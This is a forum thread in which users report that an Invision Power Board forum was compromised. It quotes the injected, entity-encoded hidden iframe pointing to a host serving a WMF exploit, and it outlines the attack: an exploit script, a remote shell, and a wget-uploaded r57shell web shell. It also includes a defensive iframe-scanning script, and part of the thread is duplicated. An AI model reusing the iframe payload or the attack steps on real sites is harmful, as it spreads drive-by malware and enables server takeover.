Have the forums been hacked?



It's every page (of the forums) redmark

</head>

<body>

CODE IS HERE

<div id="ipbwrapper">

<script type="text/javascript">

It's right near the top,

And is it just the forums or also the main page?

It's only the forums, not the main page. Anyways, the site should be taken offline until it's fixed, otherwise lots of people will be hacked. Also, and obviously, web pages don't just change themselves...


Lucky I am on my Mac! God this could be dangerous (I don't even have anti-virus for my non-internet connected laptop - I don't connect it to the internet so in most cases it doesn't matter). There isn't anything at http://zchxsikpgz.biz/. It is just the default Apache filler page! This is really bad. I hope it can be squashed soon.

Cal


<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#122;&#99;&#104;&#120;&#115;&#105;&#107;&#112;&#103;&#122;&#46;&#98;&#105;&#122;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#51;&#46;&#112;&#104;&#112;" width=1 height=1></iframe>

When the HTML entities are decoded ("&#;"), it is http://zchxsikpgz.biz/dl/adv543.php

Didn't affect Firefox, had to fire up IE7 Beta 3 to see it, and NOD32 stopped it.

Can anyone post a selection of the source because I don't see it

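A defender-side check for the kind of injection quoted above, as an added example that is not part of the original thread: it parses a page's HTML and reports iframes that are near-invisible, hidden by style, or whose `src` is written as numeric character references, along with the decoded URL. The sample page, the placeholder URL, and the two thresholds are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

CHARREF = re.compile(r"&#(?:\d+|[xX][0-9a-fA-F]+);")
RAW_SRC = re.compile(r"""\bsrc\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""", re.I)
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
MIN_REFS = 4      # assumed threshold: a stray reference such as &#38; is normal
MAX_TINY_PX = 2   # assumed limit for a frame nobody is meant to see

def _tiny(value):
    # True when a width/height attribute is a pixel count of MAX_TINY_PX or less.
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value or "", re.I)
    return bool(m) and int(m.group(1)) <= MAX_TINY_PX

class IframeAuditor(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        attr = dict(attrs)  # the parser has already decoded entities in values
        # The raw tag text is needed to see how the src was written in the file.
        raw = RAW_SRC.search(self.get_starttag_text() or "")
        refs = len(CHARREF.findall(raw.group(1))) if raw else 0
        reasons = []
        if _tiny(attr.get("width")) or _tiny(attr.get("height")):
            reasons.append("near-invisible size")
        if HIDDEN_STYLE.search(attr.get("style") or ""):
            reasons.append("hidden by style")
        if refs >= MIN_REFS:
            reasons.append(f"src written as {refs} character references")
        if reasons:
            self.findings.append({"line": self.getpos()[0], "reasons": reasons,
                                  "src": (attr.get("src") or "").strip()})

def audit_html(text):
    """Return one finding per suspicious iframe in a page's HTML source."""
    parser = IframeAuditor()
    parser.feed(text)
    parser.close()
    return parser.findings

# Constructed sample: placeholder URL, encoded as decimal character references.
SAMPLE_URL = "http://injected.example.invalid/landing.php"
SAMPLE_PAGE = ('</head>\n<body>\n<iframe src="'
    + "".join(f"&#{ord(c)};" for c in SAMPLE_URL) + '" width=1 height=1></iframe>\n'
    '<div id="ipbwrapper">\n<iframe src="/a.html" width="600" height="400"></iframe>\n')

if __name__ == "__main__": print(audit_html(SAMPLE_PAGE))
```

Running `audit_html` over the rendered output of each forum template, or over saved copies of served pages, shows the line where the tag sits and the URL it resolves to.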

I can confirm: Invision Power Board has been hacked.

That happened also to my forum at http://forum.wininizio.it

Useful notice for the admins: grep your server for the string "r57shell".

The hacker that attacked our website used this perl script: http://www.milw0rm.com/exploits/1720

The script attacks IPB up to v 2.1.5 but it could be improved to attack 2.1.6 also. The perl script can be locally executed (you just need a Perl environment in your system): it adds a post with a user account specifically added to begin the attack; the script then adds a new post with strange characters and finally it enables a remote shell. The hacker that attacked us placed a WGET command to upload a web shell (r57shell.php) that gives full control over the server, so he was able to modify the index.php file of any web application he found on our server.


It's gone, but the exploit is still live. Invision needs to release a fix, or a workaround implemented before we can be sure it won't happen again.

So what is this nasty trying to do anyway?

That code tries to load a remote malformed .WMF file in order to hit unpatched Windows systems.

I can confirm: Invision Power Board has been hacked.

That happened also to my forum at http://forum.wininizio.it

Useful notice for the admins: grep your server for the string "r57shell".

The hacker that attacked our website used this perl script: http://www.milw0rm.com/exploits/1720

The script attacks IPB up to v 2.1.5 but it could be improved to attack 2.1.6 also. The perl script can be locally executed (you just need a Perl environment in your system): it adds a post with a user account specifically added to begin the attack; the script then adds a new post with strange characters and finally it enables a remote shell. The hacker that attacked us placed a WGET command to upload a web shell (r57shell.php) that gives full control over the server, so he was able to modify the index.php file of any web application he found on our server.

Additional info: this kind of attack uses the Invision folders that need to be chmod 0777 like /uploads or similar.


I wonder if it actually "got" anyone.

I think that someone has been affected: not everybody has applied the WMF patch :(


This topic is now closed to further replies.